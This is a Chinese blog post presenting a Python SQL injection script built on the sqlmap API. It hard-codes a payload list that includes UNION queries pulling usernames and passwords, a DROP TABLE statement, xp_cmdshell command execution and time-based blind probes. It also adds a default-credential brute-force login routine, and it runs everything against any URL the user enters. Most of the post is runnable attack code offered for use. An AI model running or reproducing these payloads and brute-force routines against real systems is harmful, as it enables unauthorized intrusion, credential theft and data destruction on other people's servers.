基于sqlmap-api的sql注入脚本的开发

avatar
作者
猴君
阅读量:0

两个版本改进功能如下:

  1. 自动化暴力破解功能:尝试使用常见的用户名和密码组合来测试登录页面。
  2. 探测响应时间:为布尔盲注的 SQL 注入,测量响应时间来检测延迟。
  3. 数据提取功能:尝试提取数据库的版本和表结构。
  4. 结果日志:将扫描结果记录到文件中,以便分析。
import requests import json import time  # SQLMap API URL SQLMAP_API_URL = "http://localhost:8775/ajax" # SQL 注入测试样本列表   SQL_INJECTION_PAYLOADS = [       "'",  # 单引号引发基本的 SQL 错误       '"',  # 双引号引发基本的 SQL 错误       "' OR '1'='1' --",  # 典型的真语句注入       "' OR '1'='1' /*",  # 使用注释符号进行注入       "' OR 1=1 --",  # 另一种基本的真语句注入       "' OR 1=1 /*",  # 另一种基本的真语句注入,使用评论       "' UNION SELECT NULL, username, password FROM users --",  # 使用 UNION 查询       "' UNION SELECT 1, @@version --",  # 获取数据库版本       "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --",  # 字符串获取       "' HAVING 1=1 --",  # HAVING 子句测试       "'; DROP TABLE users; --",  # 尝试删除表 (仅供测试目的,切勿在生产环境中执行)       "'; EXEC xp_cmdshell('whoami'); --",  # SQL Server 命令执行       "'; SELECT * FROM information_schema.tables; --",  # 获取表信息       "' AND 1=(SELECT COUNT(*) FROM users) --",  # 计数测试       "'; SELECT concat(username, ':', password) FROM users --",  # 获取用户名和密码组合       "'; WAITFOR DELAY '0:0:5'; --",  # 基于延迟的盲注测试       "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --",  # 使用 CASE 语句       "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --",  # 多个 NULL 测试       "' AND EXISTS(SELECT * FROM users WHERE username='admin') --",  # 检查用户是否存在       "'; SELECT @@datadir; --",  # 获取数据库目录信息       "' AND ascii(substring((SELECT password FROM users WHERE username='admin'),1,1)) > 100 --",  # 通过字符编码进行盲注   ]    # 确保在代码中使用时将此列表作为您的 SQL 注入负载引用  # Credentials for brute force testing CREDENTIALS = [     ('admin', 'password123'),     ('admin', 'admin'),     ('user', 'user123'), ]  # Function settings LEVEL = 2  # SQLMap scan level RISK = 2   # SQLMap risk level  def log_results(file_name, data):     """Log results to a file."""     with open(file_name, 'a') as f:         f.write(data + '\n')   def start_scan(target_url):     data = {         'url': target_url,         'level': LEVEL,         'risk': RISK,     }      try:         response = requests.post(f"{SQLMAP_API_URL}/task/new", data=data)         response.raise_for_status()         task_info = response.json()          if task_info.get('status') == 'success':             task_id = task_info['taskid']             print(f"Created task: {task_id}")              response = requests.post(f"{SQLMAP_API_URL}/scan/{task_id}")             response.raise_for_status()             scan_info = response.json()              if scan_info.get('status') == 'success':                 print(f"Started scan for task: {task_id}")                  while True:                     response = requests.get(f"{SQLMAP_API_URL}/scan/{task_id}")                     response.raise_for_status()                     scan_result = response.json()                      if scan_result.get('status') in ['terminated', 'done']:                         print("Scan completed.")                         break                     elif scan_result.get('status') == 'running':                         print("Scan is still running...")                     else:                         print("Error retrieving scan status.")                         break                      time.sleep(5)                  response = requests.get(f"{SQLMAP_API_URL}/scan/{task_id}/data")                 response.raise_for_status()                 results = response.json()                  if results:                     print("Scan results:")                     print(json.dumps(results, indent=4))                     log_results("scan_results.log", json.dumps(results, indent=4))                 else:                     print("No results found for the scan.")             else:                 print("Failed to start scan.")         else:             print("Failed to create task.")          except requests.exceptions.RequestException as e:         print(f"Request failed: {e}")     except json.JSONDecodeError:         print("Failed to decode JSON response.")     except KeyError as e:         print(f"Missing key in response: {e}")  def test_sql_injection(target_url):     print("Testing for SQL injection vulnerabilities...")     for payload in SQL_INJECTION_PAYLOADS:         inject_url = f"{target_url}{payload}"         print(f"Testing payload: {inject_url}")                  try:             response = requests.get(inject_url)             if response.status_code == 200:                 if "SQL syntax" in response.text or "error" in response.text.lower():                     print(f"Possible SQL injection vulnerability found with payload: {payload}")                     log_results("sql_injection_results.log", f"Vulnerable payload: {payload}")                 else:                     print(f"No vulnerability found with payload: {payload}")             else:                 print(f"Received unexpected status code: {response.status_code} for payload: {payload}")         except requests.exceptions.RequestException as e:             print(f"Request failed for payload {payload}: {e}")  def brute_force_login(target_url):     print("Attempting to brute force login...")      for username, password in CREDENTIALS:         data = {             'username': username,             'password': password,         }          try:             response = requests.post(target_url, data=data)             if "Invalid username or password" not in response.text:  # adjust this condition based on the actual response                 print(f"Successful login with {username}:{password}")                 log_results("brute_force_results.log", f"Successful login: {username}:{password}")                 break             else:                 print(f"Failed login with {username}:{password}")         except requests.exceptions.RequestException as e:             print(f"Request failed for {username}:{password}: {e}")  def response_time_check(target_url):     print("Checking for blind SQL injection via response time...")          # Example method to check for response timing, may need adjustment based on target     payload = "' OR IF(1=1, SLEEP(5), 0) -- "     inject_url = f"{target_url}{payload}"          start_time = time.time()     try:         response = requests.get(inject_url)         end_time = time.time()          if response.status_code == 200:             response_time = end_time - start_time             print(f"Response time: {response_time}s")             if response_time > 5:                 print("Possible SQL injection vulnerability detected due to delayed response.")                 log_results("timing_attack_results.log", "Possible SQL injection vulnerability due to timing.")         else:             print(f"Received unexpected status code: {response.status_code} for timing check.")          except requests.exceptions.RequestException as e:         print(f"Request failed for timing check: {e}")  if __name__ == "__main__":     target_url = input("Please enter the target URL (with parameters, if necessary): ")          # 测试 SQL 注入     test_sql_injection(target_url)          # 启动 SQLMap 扫描     start_scan(target_url)      # 垂直暴力破解     brute_force_login(target_url)      # 响应时间检查     response_time_check(target_url) 

在这里插入图片描述

改进点说明:

  1. 暴力破解功能

    • 添加了 brute_force_login 函数,尝试使用预定义的用户凭证进行登录尝试。
  2. 响应时间检查

    • 增加了 response_time_check 函数,用于检测盲注并测试 SQL 注入的可能延迟。
  3. 日志记录

    • 每个功能都添加了日志记录,便于后续分析。扫描结果、暴力破解结果和响应时间都被写入对应的日志文件中。

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!